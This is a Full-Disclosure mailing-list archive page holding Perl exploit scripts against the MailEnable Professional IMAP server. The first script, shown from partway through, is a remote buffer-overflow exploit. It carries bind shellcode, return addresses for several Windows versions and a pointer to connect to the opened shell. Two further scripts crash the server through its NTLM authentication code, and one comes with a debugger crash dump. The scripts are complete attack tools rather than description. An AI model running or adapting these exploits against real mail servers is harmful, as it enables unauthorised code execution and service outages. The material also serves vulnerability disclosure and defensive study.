  \x4e\x33\xe4\x96\xcd\xcc\x32\x69;

# ff e4 - jmp %esp
my @offsets = ( \xf8\xfe\x5a\x7c, # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
\xe2\x48\xe6\x77, # WinXP SP0 KERNEL32.dll 5.1.2600.0
\x06\x38\xe6\x77, # WinXP SP1 KERNEL32.dll 5.1.2600.11061
\xd9\xae\x80\x7c, # WinXP SP2 KERNEL32.dll 5.1.2600.21802
\x62\x51\xeb\x77, # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
\xef\xbe\xad\xde  # DoS
  );

print_header;

my $target;
my $offset;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }
if (!(defined($target))) { usage; }
if (!(defined($offset))) { $offset = 0; }
if ($offset  $#offsets) {
print(only .($#offsets+1). targets known!!\n);
exit(1);
} else {
$offset = $offsets[$offset];
}

my $imapd_port = 143;
my $send_delay = 2;

my $NOP = 'A';
my $START_PAD = 3;

if (connect_host($target, $imapd_port)) {
print(- * Connected\n);
send(SOCKET, 1 LOGIN {1022}\r\n, 0);
sleep(2);

print(- * Sending padding payload\n);
# first recv  0x3fe, NULL tricks strncpy...
send(SOCKET, \x00.($NOP x 1020), 0);
sleep($send_delay);

print(- * Sending payload\n);
$buf = ($NOP x $START_PAD).# padding
   \xee\xaf\xdc\xba. # dummy var_0
   \xef\xbe\xad\xde. # EBP
   $offset.# EIP
   \xdc\xa3\x19\x03. # dummy arg_0 \xdc\xa3\x19\x03 v2.33
   ($NOP x 4). # NOPS
   $zshell_win32_bind. # hellcode
   $NOP x (0x3fd-$START_PAD-16-length($zshell_win32_bind)-5);

send(SOCKET, $buf, 0);
sleep($send_delay);

print(- * Successfully sent payload!\n);
print(- * nc .$target. 1337 for shell...\n);
}

sub print_header {
print(MailEnable Pro v2.32-4 (HOTFIX) remote exploit\n);
print(by: [EMAIL PROTECTED]\n\n);
}

sub usage {
  print(qq(Usage: $0 -t hostname

 -t hostname: hostname to test
 -n num : return addy offset number
));

exit(1);
}

sub connect_host {
($target, $port) = @_;
$iaddr  = inet_aton($target) || die(Error: $!\n);
$paddr  = sockaddr_in($port, $iaddr) || die(Error: $!\n);
$proto  = getprotobyname('tcp')  || die(Error: $!\n);

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(Error: $!\n);
connect(SOCKET, $paddr)  || die(Error: $!\n);
return(1338);
}
#!/usr/bin/perl
#
# maildisable-v6.pl
#
# Mail Enable Professional =v2.35 (win32) remote exploit
# by mu-b - Tue Dec 5 2006
#
# - Tested on: Mail Enable Professional v2.35 (win32)
#
# Note: timing

[Full-disclosure] MailEnable DoS POC

2007-02-14 Thread mu-b

The POC attached exploits an out of bounds memory read in the NTLM 
authentication
routines of MailEnable Pro/Enterprise. The problem lies in the NTLM_UnPack_Type3
function of MENTLM.dll.

This appears to have been silently patched somewhere between versions 2.351 
and
2.36-7. (observe the quotes).

(c34.dc0): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=8146930b ebx=003a6cc8 ecx=0040 edx= esi=8146920b edi=0146b238
eip=0109b4b3 esp=014691e4 ebp=014691ec iopl=0 nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=00010212
MENTLM!NTLM_UnPack_Type3+0x3019:
0109b4b3 f3a5rep movs dword ptr es:[edi],dword ptr [esi] 
es:0023:0146b238= ds:0023:8146920b=

---
([EMAIL PROTECTED])
#!/usr/bin/perl
#
# maildisable-v5.pl
#
# Mail Enable Professional/Enterprise =v2.35 (win32)
# by mu-b - Wed Nov 29 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
#  Mail Enable Professional v2.33 (win32)
#  Mail Enable Professional v2.34 (win32)
#  Mail Enable Professional v2.35 (win32)
#
# out of bounds read == DoS
#


use Getopt::Std; getopts('t:', \%arg);
use Socket;
use MIME::Base64;

print_header;

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { usage; }

my $imapd_port = 143;
my $send_delay = 2;

my $PAD = 'A';

if (connect_host($target, $imapd_port)) {
print(- * Connected\n);
send(SOCKET, 1 AUTHENTICATE NTLM\r\n, 0);
sleep($send_delay);

$buf = ($PAD x 12).
   \xfa\xff\xff\xff.
   ($PAD x 12);
send(SOCKET, encode_base64($buf).\r\n, 0);
sleep($send_delay);

$buf = ($PAD x 28).
   \x00\x01.
   ($PAD x 2).
   \xef\xbe\xad\xde;
send(SOCKET, encode_base64($buf).\r\n, 0);
sleep($send_delay);

print(- * Successfully sent payload!\n);
}

sub print_header {
print(MailEnable Pro =v2.36 DoS POC\n);
print(by: [EMAIL PROTECTED]\n\n);
}

sub usage {
  print(qq(Usage: $0 -t hostname

 -t hostname: hostname to test
));

exit(1);
}

sub connect_host {
($target, $port) = @_;
$iaddr  = inet_aton($target) || die(Error: $!\n);
$paddr  = sockaddr_in($port, $iaddr) || die(Error: $!\n);
$proto  = getprotobyname('tcp')  || die(Error: $!\n);

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(Error: $!\n);
connect(SOCKET, $paddr)  || die(Error: $!\n);
return(1338);
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] MailEnable DoS POC-2

2007-02-14 Thread mu-b

This version will work on the latest MailEnable v2.37..

Symantec seem to think this is the same issue as BID 20290, but it is
in fact, completely different... and somewhat unpatched..
---
([EMAIL PROTECTED])

#!/usr/bin/perl
#
# maildisable-v7.pl
#
# Mail Enable Professional/Enterprise v2.32-7 (win32)
# by mu-b - Wed Feb 14 2007
#
# - Tested on: Mail Enable Professional v2.37 (win32)
#


use Getopt::Std; getopts('t:', \%arg);
use Socket;
use MIME::Base64;

print_header;

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { usage; }

my $imapd_port = 143;
my $send_delay = 2;

my $PAD = 'A';

if (connect_host($target, $imapd_port)) {
print(- * Connected\n);
send(SOCKET, 1 AUTHENTICATE NTLM\r\n, 0);
sleep($send_delay);

$buf = ($PAD x 12).
   \xfa\xff\xff\xff.
   ($PAD x 12);
send(SOCKET, encode_base64($buf).\r\n, 0);
sleep($send_delay);

$buf = ($PAD x 28).
   \x00\x01.
   ($PAD x 2).
   \xff\xff\xff\x7f;
send(SOCKET, encode_base64($buf).\r\n, 0);
sleep($send_delay);

print(- * Successfully sent payload!\n);
}

sub print_header {
print(MailEnable Pro v2.37 DoS POC\n);
print(by: [EMAIL PROTECTED]\n\n);
}

sub usage {
print(qq(Usage: $0 -t hostname

 -t hostname: hostname to test
));

exit(1);
}

sub connect_host {
($target, $port) = @_;
$iaddr  = inet_aton($target) || die(Error: $!\n);
$paddr  = sockaddr_in($port, $iaddr) || die(Error: $!\n);
$proto  = getprotobyname('tcp')  || die(Error: $!\n);

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(Error: $!\n);
connect(SOCKET, $paddr)  || die(Error: $!\n);
return(1338);
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Trusteer Rapport and anti-keylogging

[Full-disclosure] NovaStor NovaNet = 13.0 issues

[Full-disclosure] un-SafeCentral

Re: [Full-disclosure] VMSA-2009-0013 VMware Fusion resolves two security issues

Re: [Full-disclosure] FreeBSD/OS X kernel bug dump

[Full-disclosure] FreeBSD/OS X kernel bug dump

[Full-disclosure] eXtremail(ly easy) remote roots

[Full-disclosure] SafeNET High Assurance Remote/SoftRemote (IPSecDrv.sys) remote DoS

[Full-disclosure] mydns-1.1.0 remote heap overflow

[Full-disclosure] eXtremail-v9

Re: [Full-disclosure] dproxy - arbitrary code execution through stack buffer overflow vulnerability

[Full-disclosure] Mercur SP4 IMAPD

[Full-disclosure] Mercury/32 4.01b

[Full-disclosure] MailEnable v2.37 APPEND exploit

[Full-disclosure] More MailEnable exploits..

[Full-disclosure] MailEnable DoS POC

[Full-disclosure] MailEnable DoS POC-2

17 matches

Site Navigation

Mail list logo

Footer information